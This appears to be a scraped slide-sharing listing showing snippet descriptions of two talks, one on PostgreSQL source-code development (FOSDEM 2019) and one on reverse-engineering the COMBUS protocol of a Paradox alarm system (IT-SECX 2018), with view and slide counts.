Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com FOSDEM 2019 February 3, 2019 PostgreSQL Source Code Hacking PostgreSQL Final Code PostgreSQL Subsystems Hacking the PostgreSQL Way Stephen Frost Chief Technology

783 views • 37 slides
How reversing the COMBUS protocol resulted in breaking security Hacking COMBUS in a of a

How reversing the COMBUS protocol resulted in breaking security Hacking COMBUS in a of a

How reversing the COMBUS protocol resulted in breaking security Hacking COMBUS in a of a security system Paradox security system 16.11.2018. IT-SECX 2018, Austria Author Lead researcher at Possible Security, Latvia Hacking and

700 views • 29 slides

More recommend